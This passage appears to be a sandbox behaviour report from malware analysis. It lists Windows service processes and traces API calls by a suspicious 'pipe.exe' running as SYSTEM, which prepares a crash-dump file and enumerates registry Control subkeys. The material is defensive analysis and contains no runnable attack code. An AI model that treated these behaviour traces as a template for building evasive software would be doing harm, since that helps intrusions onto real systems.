SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 210 os_tid = 0x9b8 Thread: id = 211 os_tid = 0x9a8 Thread: id = 212 os_tid = 0x978 Thread: id = 213 os_tid = 0x968 Thread: id = 214 os_tid = 0x5d4 Thread: id = 215 os_tid = 0x320 Thread: id = 216 os_tid = 0x6cc Thread: id = 217 os_tid = 0x42c Thread: id = 218 os_tid = 0x1e4 Thread: id = 219 os_tid = 0x760 Thread: id = 220 os_tid = 0x75c Thread: id = 221 os_tid = 0x74c Thread: id = 222 os_tid = 0x710 Thread: id = 223 os_tid = 0x6d0 Thread: id = 224 os_tid = 0x6bc Thread: id = 225 os_tid = 0x6b8 Thread: id = 226 os_tid = 0x6b0 Thread: id = 227 os_tid = 0x69c Thread: id = 228 os_tid = 0x698 Thread: id = 229 os_tid = 0x684 Thread: id = 230 os_tid = 0x678 Thread: id = 231 os_tid = 0x4a8 Thread: id = 232 os_tid = 0x46c Thread: id = 233 os_tid = 0x44c Thread: id = 234 os_tid = 0x424 Thread: id = 235 os_tid = 0x420 Thread: id = 236 os_tid = 0x41c Thread: id = 237 os_tid = 0x404 Thread: id = 238 os_tid = 0x14c Thread: id = 239 os_tid = 0x158 Thread: id = 240 os_tid = 0x3fc Thread: id = 241 os_tid = 0x3f4 Thread: id = 242 os_tid = 0x3e8 Thread: id = 243 os_tid = 0x39c Thread: id = 244 os_tid = 0x390 Thread: id = 245 os_tid = 0x38c Thread: id = 246 os_tid = 0x388 Thread: id = 247 os_tid = 0x37c Thread: id = 248 os_tid = 0x374 Thread: id = 367 os_tid = 0x9f8 Thread: id = 368 os_tid = 0xa18 Thread: id = 369 os_tid = 0xa28 Thread: id = 403 os_tid = 0xbac Process: id = "16" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9236000" os_pid = "0x11c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e33a" [0xc000000f], "LOCAL" [0x7] Thread: id = 249 os_tid = 0xc4 Thread: id = 250 os_tid = 0x96c Thread: id = 251 os_tid = 0xaf8 Thread: id = 252 os_tid = 0xaf4 Thread: id = 253 os_tid = 0xa8c Thread: id = 254 os_tid = 0x548 Thread: id = 255 os_tid = 0x750 Thread: id = 256 os_tid = 0x6a0 Thread: id = 257 os_tid = 0x68c Thread: id = 258 os_tid = 0x680 Thread: id = 259 os_tid = 0x66c Thread: id = 260 os_tid = 0x614 Thread: id = 261 os_tid = 0x5fc Thread: id = 262 os_tid = 0x188 Thread: id = 263 os_tid = 0x140 Thread: id = 264 os_tid = 0x128 Thread: id = 265 os_tid = 0x2b0 Thread: id = 266 os_tid = 0x214 Thread: id = 267 os_tid = 0x130 Thread: id = 268 os_tid = 0x218 Thread: id = 269 os_tid = 0x1cc Process: id = "17" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x7c150000" os_pid = "0x47c" os_integrity_level = "0x4000" os_privileges = "0x20a00080" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:00010a1b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 270 os_tid = 0xa48 Thread: id = 271 os_tid = 0x4b8 Thread: id = 272 os_tid = 0x4b4 Thread: id = 273 os_tid = 0x498 Thread: id = 274 os_tid = 0x494 Thread: id = 275 os_tid = 0x480 Thread: id = 377 os_tid = 0xd0 Thread: id = 380 os_tid = 0xdc Thread: id = 381 os_tid = 0xe0 Thread: id = 382 os_tid = 0xe4 Thread: id = 383 os_tid = 0xe8 Thread: id = 384 os_tid = 0xec Thread: id = 385 os_tid = 0x72c Thread: id = 386 os_tid = 0x748 Thread: id = 387 os_tid = 0x540 Thread: id = 388 os_tid = 0x7e8 Thread: id = 390 os_tid = 0x410 Thread: id = 391 os_tid = 0x774 Thread: id = 392 os_tid = 0xafc Thread: id = 393 os_tid = 0x31c Process: id = "18" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x35aa000" os_pid = "0x4bc" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0001106d" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 276 os_tid = 0x838 Thread: id = 277 os_tid = 0x7d8 Thread: id = 278 os_tid = 0x744 Thread: id = 279 os_tid = 0x740 Thread: id = 280 os_tid = 0x73c Thread: id = 281 os_tid = 0x6d8 Thread: id = 282 os_tid = 0x63c Thread: id = 283 os_tid = 0x62c Thread: id = 284 os_tid = 0x628 Thread: id = 285 os_tid = 0x624 Thread: id = 286 os_tid = 0x61c Thread: id = 287 os_tid = 0x610 Thread: id = 288 os_tid = 0x5e8 Thread: id = 289 os_tid = 0x5c8 Thread: id = 290 os_tid = 0x5c0 Thread: id = 291 os_tid = 0x5a0 Thread: id = 292 os_tid = 0x4f8 Thread: id = 293 os_tid = 0x4ec Thread: id = 294 os_tid = 0x4e0 Thread: id = 295 os_tid = 0x4d4 Thread: id = 296 os_tid = 0x4c4 Thread: id = 297 os_tid = 0x4c0 Thread: id = 375 os_tid = 0x8f8 Process: id = "19" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0xded000" os_pid = "0x4c8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "\"taskhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 298 os_tid = 0x7d0 Thread: id = 299 os_tid = 0x644 Thread: id = 300 os_tid = 0x7f0 Thread: id = 301 os_tid = 0x794 Thread: id = 302 os_tid = 0x784 Thread: id = 303 os_tid = 0x77c Thread: id = 304 os_tid = 0x778 Thread: id = 305 os_tid = 0x770 Thread: id = 306 os_tid = 0x500 Thread: id = 307 os_tid = 0x4fc Thread: id = 308 os_tid = 0x4f4 Thread: id = 309 os_tid = 0x4d8 Thread: id = 310 os_tid = 0x4cc Thread: id = 351 os_tid = 0xb40 Thread: id = 372 os_tid = 0x8e8 Process: id = "20" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0x5e615000" os_pid = "0xbe0" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "taskhost.exe $(Arg0)" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT TASK\\Microsoft-Windows-SideShow-AutoWake" [0xe], "NT TASK\\Microsoft-Windows-SideShow-SystemDataProviders" [0xe], "NT TASK\\Microsoft-Windows-Customer Experience Improvement Program-UsbCeip" [0xe], "NT TASK\\Microsoft-Windows-Ras-MobilityManager" [0xe], "NT TASK\\Microsoft-Windows-PerfTrack-BackgroundConfigSurveyor" [0xe], "NT TASK\\Microsoft-Windows-RAC-RacTask" [0xe], "NT TASK\\Microsoft-Windows-Customer Experience Improvement Program-KernelCeipTask" [0xe], "NT AUTHORITY\\Logon Session 00000000:000556b2" [0xc0000007], "LOCAL" [0x7] Thread: id = 311 os_tid = 0xb80 Thread: id = 312 os_tid = 0x85c Thread: id = 313 os_tid = 0x84c Thread: id = 314 os_tid = 0x83c Thread: id = 315 os_tid = 0x82c Thread: id = 316 os_tid = 0x80c Thread: id = 317 os_tid = 0x53c Thread: id = 318 os_tid = 0xbf8 Thread: id = 319 os_tid = 0xbf0 Thread: id = 320 os_tid = 0xbec Thread: id = 321 os_tid = 0xbe8 Thread: id = 322 os_tid = 0xbe4 Thread: id = 371 os_tid = 0x948 Process: id = "21" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x38e32000" os_pid = "0x600" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\FDResPub" [0xa], "NT SERVICE\\FontCache" [0xe], "NT SERVICE\\Mcx2Svc" [0xa], "NT SERVICE\\QWAVE" [0xa], "NT SERVICE\\SCardSvr" [0xa], "NT SERVICE\\SensrSvc" [0xa], "NT SERVICE\\SSDPSRV" [0xa], "NT SERVICE\\TBS" [0xa], "NT SERVICE\\upnphost" [0xa], "NT SERVICE\\wcncsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0005d8af" [0xc000000f], "LOCAL" [0x7] Thread: id = 323 os_tid = 0x8ac Thread: id = 324 os_tid = 0x8ec Thread: id = 325 os_tid = 0xb0c Thread: id = 326 os_tid = 0x344 Thread: id = 334 os_tid = 0x8bc Thread: id = 336 os_tid = 0x94c Process: id = "22" image_name = "pipe.exe" filename = "c:\\windows\\syswow64\\pipe.exe" page_root = "0x3a43c000" os_pid = "0x9dc" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\SysWOW64\\Pipe.exe -s" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 327 os_tid = 0x248 [0068.881] GetModuleHandleA (lpModuleName=0x0) returned 0x1000000 [0068.881] GetProcessHeap () returned 0x4a0000 [0068.882] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4681) returned 0x4b4888 [0068.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff5c | out: lpSystemTimeAsFileTime=0x18ff5c*(dwLowDateTime=0xcb69d8e0, dwHighDateTime=0x1d64ac6)) [0068.889] QueryPerformanceFrequency (in: lpFrequency=0x18ff64 | out: lpFrequency=0x18ff64*=100000000) returned 1 [0068.889] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff54 | out: lpPerformanceCount=0x18ff54*=18963473167) returned 1 [0068.889] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x90 [0068.890] GetModuleHandleA (lpModuleName=0x0) returned 0x1000000 [0068.890] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x208) returned 0x4b8f18 [0068.890] GetModuleFileNameW (in: hModule=0x1000000, lpFilename=0x4b8f18, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\Pipe.exe" (normalized: "c:\\windows\\syswow64\\pipe.exe")) returned 0x1c [0068.890] StrRChrW (lpStart="C:\\Windows\\SysWOW64\\Pipe.exe", lpEnd=0x0, wMatch=0x5c) returned="\\Pipe.exe" [0068.890] lstrlenW (lpString="Pipe.exe") returned 8 [0068.890] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x12) returned 0x4b9128 [0068.890] PathFindExtensionW (pszPath="Pipe.exe") returned=".exe" [0068.890] StrChrW (lpStart="Pipe", wMatch=0x3a) returned 0x0 [0068.890] LoadLibraryA (lpLibFileName="DBGHELP.DLL") returned 0x75590000 [0068.893] GetProcAddress (hModule=0x75590000, lpProcName="MiniDumpWriteDump") returned 0x755d5d38 [0068.893] lstrlenW (lpString="Pipe") returned 4 [0068.893] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x11 [0068.893] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x34) returned 0x4b9148 [0068.893] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x4b9148, nSize=0x11 | out: lpDst="C:\\Windows\\TEMP\\") returned 0x11 [0068.894] lstrcatW (in: lpString1="C:\\Windows\\TEMP\\", lpString2="Pipe" | out: lpString1="C:\\Windows\\TEMP\\Pipe") returned="C:\\Windows\\TEMP\\Pipe" [0068.894] lstrcatW (in: lpString1="C:\\Windows\\TEMP\\Pipe", lpString2=".dmp" | out: lpString1="C:\\Windows\\TEMP\\Pipe.dmp") returned="C:\\Windows\\TEMP\\Pipe.dmp" [0068.894] CreateFileW (lpFileName="C:\\Windows\\TEMP\\Pipe.dmp" (normalized: "c:\\windows\\temp\\pipe.dmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0068.895] SetFilePointer (in: hFile=0x94, lDistanceToMove=65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0068.895] SetEndOfFile (hFile=0x94) returned 1 [0068.896] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x100416a) returned 0x0 [0068.896] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control", phkResult=0x18ff88 | out: phkResult=0x18ff88*=0x98) returned 0x0 [0068.896] RegEnumKeyW (in: hKey=0x98, dwIndex=0x0, lpName=0x18fd58, cchName=0x104 | out: lpName="ACPI") returned 0x0 [0068.896] lstrlenW (lpString="ACPI") returned 4 [0068.896] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x16) returned 0x4b9188 [0068.896] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1, lpName=0x18fd58, cchName=0x104 | out: lpName="AGP") returned 0x0 [0068.896] lstrlenW (lpString="AGP") returned 3 [0068.896] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b91a8 [0068.896] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2, lpName=0x18fd58, cchName=0x104 | out: lpName="AppID") returned 0x0 [0068.897] lstrlenW (lpString="AppID") returned 5 [0068.897] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b91c8 [0068.897] lstrcmpW (lpString1="agp", lpString2="app") returned -1 [0068.899] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x12) returned 0x4b9368 [0068.899] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3, lpName=0x18fd58, cchName=0x104 | out: lpName="Arbiters") returned 0x0 [0068.899] lstrlenW (lpString="Arbiters") returned 8 [0068.899] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1e) returned 0x4b3e68 [0068.899] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4, lpName=0x18fd58, cchName=0x104 | out: lpName="BackupRestore") returned 0x0 [0068.899] lstrlenW (lpString="BackupRestore") returned 13 [0068.899] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4b3e90 [0068.899] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4b3eb8 [0068.899] RegEnumKeyW (in: hKey=0x98, dwIndex=0x5, lpName=0x18fd58, cchName=0x104 | out: lpName="Class") returned 0x0 [0068.899] lstrlenW (lpString="Class") returned 5 [0068.899] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9388 [0068.899] RegEnumKeyW (in: hKey=0x98, dwIndex=0x6, lpName=0x18fd58, cchName=0x104 | out: lpName="CMF") returned 0x0 [0068.899] lstrlenW (lpString="CMF") returned 3 [0068.899] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b93a8 [0068.899] lstrcmpW (lpString1="agp", lpString2="cmf") returned -1 [0068.899] lstrcmpW (lpString1="app", lpString2="cmf") returned -1 [0068.899] RegEnumKeyW (in: hKey=0x98, dwIndex=0x7, lpName=0x18fd58, cchName=0x104 | out: lpName="CoDeviceInstallers") returned 0x0 [0068.899] lstrlenW (lpString="CoDeviceInstallers") returned 18 [0068.899] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x12) returned 0x4b93c8 [0068.900] lstrcmpW (lpString1="id", lpString2="co") returned 1 [0068.900] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4b3ee0 [0068.900] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0068.900] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x22) returned 0x4b9898 [0068.900] RegEnumKeyW (in: hKey=0x98, dwIndex=0x8, lpName=0x18fd58, cchName=0x104 | out: lpName="COM Name Arbiter") returned 0x0 [0068.900] lstrlenW (lpString="COM Name Arbiter") returned 16 [0068.900] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b93e8 [0068.900] lstrcmpW (lpString1="agp", lpString2="com") returned -1 [0068.900] lstrcmpW (lpString1="app", lpString2="com") returned -1 [0068.900] lstrcmpW (lpString1="cmf", lpString2="com") returned -1 [0068.900] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x16) returned 0x4b98c8 [0068.900] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0068.900] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4b3f08 [0068.900] lstrcmpW (lpString1="restore", lpString2="arbiter") returned 1 [0068.900] RegEnumKeyW (in: hKey=0x98, dwIndex=0x9, lpName=0x18fd58, cchName=0x104 | out: lpName="ComputerName") returned 0x0 [0068.900] lstrlenW (lpString="ComputerName") returned 12 [0068.900] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1e) returned 0x4b3f30 [0068.900] lstrcmpW (lpString1="arbiters", lpString2="computer") returned -1 [0068.900] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x16) returned 0x4b98e8 [0068.900] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0068.900] lstrcmpW (lpString1="name", lpString2="name") returned 0 [0068.901] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b98e8 | out: hHeap=0x4a0000) returned 1 [0068.901] RegEnumKeyW (in: hKey=0x98, dwIndex=0xa, lpName=0x18fd58, cchName=0x104 | out: lpName="ContentIndex") returned 0x0 [0068.901] lstrlenW (lpString="ContentIndex") returned 12 [0068.901] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4b3f58 [0068.901] lstrcmpW (lpString1="restore", lpString2="content") returned 1 [0068.901] lstrcmpW (lpString1="arbiter", lpString2="content") returned -1 [0068.901] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b98e8 [0068.901] lstrcmpW (lpString1="class", lpString2="index") returned -1 [0068.901] RegEnumKeyW (in: hKey=0x98, dwIndex=0xb, lpName=0x18fd58, cchName=0x104 | out: lpName="CrashControl") returned 0x0 [0068.901] lstrlenW (lpString="CrashControl") returned 12 [0068.901] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9908 [0068.901] lstrcmpW (lpString1="class", lpString2="crash") returned -1 [0068.901] lstrcmpW (lpString1="index", lpString2="crash") returned 1 [0068.901] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4b3f80 [0068.901] lstrcmpW (lpString1="restore", lpString2="control") returned 1 [0068.901] lstrcmpW (lpString1="arbiter", lpString2="control") returned -1 [0068.902] lstrcmpW (lpString1="content", lpString2="control") returned -1 [0068.902] RegEnumKeyW (in: hKey=0x98, dwIndex=0xc, lpName=0x18fd58, cchName=0x104 | out: lpName="CriticalDeviceDatabase") returned 0x0 [0068.902] lstrlenW (lpString="CriticalDeviceDatabase") returned 22 [0068.902] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1e) returned 0x4b3fa8 [0068.902] lstrcmpW (lpString1="arbiters", lpString2="critical") returned -1 [0068.902] lstrcmpW (lpString1="computer", lpString2="critical") returned -1 [0068.902] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4b3fd0 [0068.902] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0068.902] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0068.902] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3fd0 | out: hHeap=0x4a0000) returned 1 [0068.902] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1e) returned 0x4b3fd0 [0068.902] lstrcmpW (lpString1="arbiters", lpString2="database") returned -1 [0068.902] lstrcmpW (lpString1="computer", lpString2="database") returned -1 [0068.902] lstrcmpW (lpString1="critical", lpString2="database") returned -1 [0068.902] RegEnumKeyW (in: hKey=0x98, dwIndex=0xd, lpName=0x18fd58, cchName=0x104 | out: lpName="Cryptography") returned 0x0 [0068.902] lstrlenW (lpString="Cryptography") returned 12 [0068.902] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x26) returned 0x4b9928 [0068.902] RegEnumKeyW (in: hKey=0x98, dwIndex=0xe, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceClasses") returned 0x0 [0068.902] lstrlenW (lpString="DeviceClasses") returned 13 [0068.902] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4b3ff8 [0068.902] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0068.902] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0068.902] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3ff8 | out: hHeap=0x4a0000) returned 1 [0068.902] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4b3ff8 [0068.903] lstrcmpW (lpString1="restore", lpString2="classes") returned 1 [0068.903] lstrcmpW (lpString1="arbiter", lpString2="classes") returned -1 [0068.903] lstrcmpW (lpString1="content", lpString2="classes") returned 1 [0068.903] lstrcmpW (lpString1="control", lpString2="classes") returned 1 [0068.903] RegEnumKeyW (in: hKey=0x98, dwIndex=0xf, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceOverrides") returned 0x0 [0068.903] lstrlenW (lpString="DeviceOverrides") returned 15 [0068.903] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4b4020 [0068.903] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0068.903] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0068.903] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4020 | out: hHeap=0x4a0000) returned 1 [0068.903] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20) returned 0x4b4020 [0068.903] RegEnumKeyW (in: hKey=0x98, dwIndex=0x10, lpName=0x18fd58, cchName=0x104 | out: lpName="Diagnostics") returned 0x0 [0068.903] lstrlenW (lpString="Diagnostics") returned 11 [0068.903] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x24) returned 0x4b9958 [0068.903] RegEnumKeyW (in: hKey=0x98, dwIndex=0x11, lpName=0x18fd58, cchName=0x104 | out: lpName="Els") returned 0x0 [0068.903] lstrlenW (lpString="Els") returned 3 [0068.903] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b99a0 [0068.904] lstrcmpW (lpString1="agp", lpString2="els") returned -1 [0068.904] lstrcmpW (lpString1="app", lpString2="els") returned -1 [0068.904] lstrcmpW (lpString1="cmf", lpString2="els") returned -1 [0068.904] lstrcmpW (lpString1="com", lpString2="els") returned -1 [0068.904] RegEnumKeyW (in: hKey=0x98, dwIndex=0x12, lpName=0x18fd58, cchName=0x104 | out: lpName="Errata") returned 0x0 [0068.904] lstrlenW (lpString="Errata") returned 6 [0068.904] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4b4048 [0068.904] lstrcmpW (lpString1="backup", lpString2="errata") returned -1 [0068.904] lstrcmpW (lpString1="device", lpString2="errata") returned -1 [0068.904] RegEnumKeyW (in: hKey=0x98, dwIndex=0x13, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystem") returned 0x0 [0068.904] lstrlenW (lpString="FileSystem") returned 10 [0068.904] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x16) returned 0x4b99c0 [0068.904] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0068.904] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0068.904] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4b4070 [0068.904] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0068.904] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0068.904] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0068.904] RegEnumKeyW (in: hKey=0x98, dwIndex=0x14, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystemUtilities") returned 0x0 [0068.904] lstrlenW (lpString="FileSystemUtilities") returned 19 [0068.905] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x16) returned 0x4b99e0 [0068.905] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0068.905] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0068.905] lstrcmpW (lpString1="file", lpString2="file") returned 0 [0068.905] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b99e0 | out: hHeap=0x4a0000) returned 1 [0068.905] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4b4098 [0068.905] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0068.905] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0068.905] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0068.905] lstrcmpW (lpString1="system", lpString2="system") returned 0 [0068.905] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4098 | out: hHeap=0x4a0000) returned 1 [0068.905] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20) 